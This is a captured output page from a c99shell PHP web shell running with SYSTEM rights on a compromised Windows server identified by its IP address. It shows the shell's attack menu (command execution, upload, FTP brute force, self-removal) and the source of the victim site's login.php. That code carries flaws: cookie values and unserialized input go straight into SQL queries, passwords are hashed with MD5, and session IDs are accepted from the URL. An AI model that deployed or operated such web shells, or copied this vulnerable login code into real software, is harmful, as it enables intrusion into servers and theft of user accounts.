190.27.245.106 - c99shell

!C99Shell v. 1.0 pre-release build #13!
Software: Apache. PHP/5.5.15 uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 SYSTEM Safe-mode: OFF (not secure) E:\nuevo\htdocs\BLA\admin\ drwxrwxrwx Free 10.11 GB of 239.26 GB (4.23%) Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ] Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!C99Shell v. 1.0 pre-release build #13!

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586

SYSTEM

Safe-mode: OFF (not secure)

E:\nuevo\htdocs\BLA\admin\ drwxrwxrwx
Free 10.11 GB of 239.26 GB (4.23%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: login.php (8.38 KB) -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

userlevel; } else if ($var=='username') { $ret = $this->username; } else if ($var=='password') { $ret = $this->password; } else { $ret = false; } return $ret; } public function isadmin() { return $this->userlevel == 9; } public function getdata($data) { $data = $this->clean(trim($data)); $query = "SELECT $data FROM {$this->table} WHERE userid='{$this->userid}' LIMIT 1;"; if ($result = mysql_query($query, $this->link)) { if ($row = mysql_fetch_assoc($result)) { return $row[$data]; } } } /** * Set userdata */ public function modlastlogin() { mysql_query("UPDATE {$this->table} SET lastactive = NOW() WHERE userid = '{$this->userid}';", $this->link); return mysql_affected_rows($this->link)==1 ? true : false; } public function lastlogin() { if ($result = mysql_query("SELECT lastactive FROM {$this->table} WHERE userid = '{$this->userid}' LIMIT 1", $this->link)) { if ($row = mysql_fetch_assoc($result)) { return $row['lastactive']; } } } /** * Login core */ public function inherit($session) { session_name(urldecode($session)); } public function getSID() { return "PHPSESSID=".session_id(); } public function login($username, $password, $remember = false) { $username = $this->clean($username); $password = md5($password); $query = "SELECT * FROM {$this->table} WHERE username = '$username' LIMIT 1;"; if ($result = mysql_query($query, $this->link)) { if ($row = mysql_fetch_assoc($result)) { if ($row['password']==$password) { return $this->setSession($row, $remember); } else { $this->logout(); $this->error = 'pi'; // Password Incorrect return false; } } $this->logout(); $this->error = 'ui'; // Username Incorrect return false; } else { $this->logout(); return false; } } // Construir la session y la cookie, y guardarlas en la base de datos. private function setSession(&$values, $remember = false, $init = true) { $this->userid = $values['userid']; $this->username = $values['username']; $this->password = $values['password']; $this->userlevel = $values['userlevel']; $_SESSION['cf_login_username'] = htmlspecialchars($this->username); $cookie = md5($values['username'].date("Y-m-d")); if ($remember) { $this->update_cookie($cookie, true); } if ($init) { $session = session_id(); mysql_query("UPDATE {$this->table} SET session='{$session}', cookie='{$cookie}' WHERE userid='{$this->userid}'", $this->link); $this->modlastlogin(); } return true; } private function update_cookie($cookie) { $this->create_cookie('cf_login_cookie', serialize(array($this->username, $this->password, $cookie)), time() + 31104000); } public function create_cookie($name, $value='', $maxage=0, $domain='', $path='', $secure=false, $HTTPOnly=false) { $ob = ini_get('output_buffering'); if ($_SERVER['HTTPS']) { $secure = true; } // Abort the method if headers have already been sent, except when output buffering has been enabled if ( headers_sent() && (bool) $ob === false || strtolower($ob) == 'off' ) { return false; } if (!(bool)$maxage) { $maxage = time()+3600; } if ( !empty($domain) ) { // Fix the domain to accept domains with and without 'www.'. if ( strtolower( substr($domain, 0, 4) ) == 'www.' ) { $domain = substr($domain, 4); } // Add the dot prefix to ensure compatibility with subdomains if ( substr($domain, 0, 1) != '.' ) { $domain = '.'.$domain; } // Remove port information. $port = strpos($domain, ':'); if ( $port !== false ) { $domain = substr($domain, 0, $port); } } else { // Localhost compatibility $domain = ($_SERVER['HTTP_HOST'] != 'localhost') ? $_SERVER['HTTP_HOST'] : false; } header('Set-Cookie: ' .rawurlencode($name).'='.rawurlencode($value) .(empty($domain) ? '' : '; Domain='.$domain ) .(empty($maxage) ? '' : '; Max-Age='.$maxage) .(empty($path) ? '' : '; Path='.$path ) .(!$secure ? '' : '; Secure' ) .(!$HTTPOnly ? '' : '; HttpOnly' ) , false); return true; } // Devuelve true si el usuario estб logueado. Caso contrario devuelve false. // @return bool public function logged() { // Verificar si el usuario contiene una cookie y cargar sus datos. $cookie = array(); if ($_COOKIE['cf_login_cookie']) { list($cookie['username'], $cookie['password'], $cookie['serial']) = @unserialize(stripslashes($_COOKIE['cf_login_cookie'])); } // Verificar si los datos de la cookie son vбlidos. if ($cookie['serial'] && $cookie['username'] && $cookie['password']) { $query = "SELECT * FROM {$this->table} WHERE (username = '{$cookie['username']}') AND (password = '{$cookie['password']}') AND (cookie = '{$cookie['serial']}') LIMIT 1;"; } else { // Verificar si los datos de session son vбlidos. $username = $_SESSION['cf_login_username']; $session = session_id(); $query = "SELECT * FROM {$this->table} WHERE (username = '$username') AND (session = '$session') LIMIT 1;"; } if ($result = mysql_query($query, $this->link)) { if ($row = mysql_fetch_assoc($result)) { return $this->setSession($row, false, false); // Log in } else { return false; } } else { return false; } } // Destruir sessiуn. public function logout() { $_SESSION['cf_login_username'] = ''; $_SESSION['cf_login_cookie'] = 0; $this->create_cookie('cf_login_cookie', '', time() - 3600); mysql_query("UPDATE {$this->table} SET session='".strtoupper(md5(time()))."', cookie='".strtoupper(md5(time()))."' WHERE userid='{$this->userid}'", $this->link); $this->username = ''; $this->password = ''; $this->userlevel = 0; $this->userid = 0; } // Limpia la variable de carбcteres impuros. private function clean($value) { if (get_magic_quotes_gpc()) { $value = stripslashes($value); } $value = mysql_real_escape_string( htmlspecialchars( $value ) ); return $value; } // Crea la clase y conecta con la base de datos. // @param array : ['host'] = 'localhost'; // ['table'] = Tabla en donde se almacenan los usuarios // ['username'] = Nombre de usuario de la base de datos // ['password'] = Password de la base de datos public function __construct($array) { $this->table = $array['table'] ? $array['table'] : 'login'; $this->link = mysql_connect( $array['host'] ? $array['host'] : 'localhost', $array['username'], $array['password'], true ); if (!$this->link) { die(mysql_error()); } else { if (!mysql_select_db($array['database'])) { die(mysql_error()); } } if (isset($_GET['PHPSESSID'])) { session_id($_GET['PHPSESSID']); } session_start(); } } ?>

:: Command execute ::
Enter:	Select:

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--